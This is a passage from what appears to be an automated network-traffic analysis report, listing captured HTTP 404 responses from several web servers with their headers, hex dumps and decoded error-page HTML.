20 20 20 20 20 20 20 20 20 64 65 6c 2c 20 64 66 6e 2c 20 65 6d 2c 20 69 6d 67 2c 20 69 6e 73 2c 20 6b 62 64 2c 20 71 2c 20 73 2c 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 6d 61 6c 6c 2c 20 73 74 72 69 6b 65 2c 20 73 74 72 6f 6e 67 2c 20 73 75 62 2c 20 73 75 70 2c 20 74 74 2c 20 76 61 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 2c 20 75 2c 20 69 2c 20 63 65 6e 74 65 72 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6c 2c 20 64 74 2c 20 64 64 2c 20 6f 6c 2c 20 75 6c 2c 20 6c 69 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 2c 20 66 6f 72 6d 2c 20 6c 61 62 65 6c 2c 20 6c 65 67 65 6e 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 2c 20 63 61 70 74 69 6f 6e 2c 20 74 62 6f 64 79 2c 20 74 66 6f 6f 74 2c 20 74 68 65 61 64 2c 20 74 72 2c 20 74 68 2c 20 74 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 63 61 6e 76 61 73 2c 20 64 65 74 61 69 6c 73 2c 20 65 6d 62 65 64 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 67 75 72 65 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 6f 75 74 70 75 74 2c 20 72 75 62 79 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4ITjcmxa2kMppj5uZYQA3ULZ9AW9eYTiVqFdH91U6iwsUKrPd4hA7E8ip%2BRNHmVmZr1bSTrhWpeJv2v3Xy7PPyOtHoqT5zOzlFe4kmf5UcBvMXKz0xzg8awdNdj3WP6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb5a0a86dac31-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14235&min_rtt=14235&rtt_var=7117&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66lTVBp9VBAc63X7UODifyVyI2nX2HG4jeiMxZ8eDXJUpaEWaH%2FD6HXOkoRGK4B7BLQfsF4cAKm0gSfgqROk%2BoNeOGaIpFhY%2B2OpBGebKaHERe8CPZzAjqDcZEPL3CmA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb5b0887843c9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ7mn9mopVHcObdpTm%2BYgsXPVgudGPkOeXjN7bpeZ2Q5yXyeOrVigxyKQg0nMUzuIu3Z1iBeCB2eXn0QCRckIkNFJcoWqQSA6kE2HFAy99bNQzl2CYOTuGtjXsO0Y9Rl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb5c0cd49ab6a-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14061&min_rtt=14061&rtt_var=7030&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:24:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rC0cfyxn%2F8fo7tkr15sJjVRMskje9PB%2BO28UjVYNxUegWBlkIGfCWqSRKlO3oeXWyXM6l32tOaSXtPP7uGfSPiGmGAok0%2FOnZaMnePSndS6Sp7n6OphxLQX05uC%2F96Ri"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb5d6ce4caae5-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14176&min_rtt=14176&rtt_var=7088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=478&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disabl
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:05 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:08 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:10 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:13 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
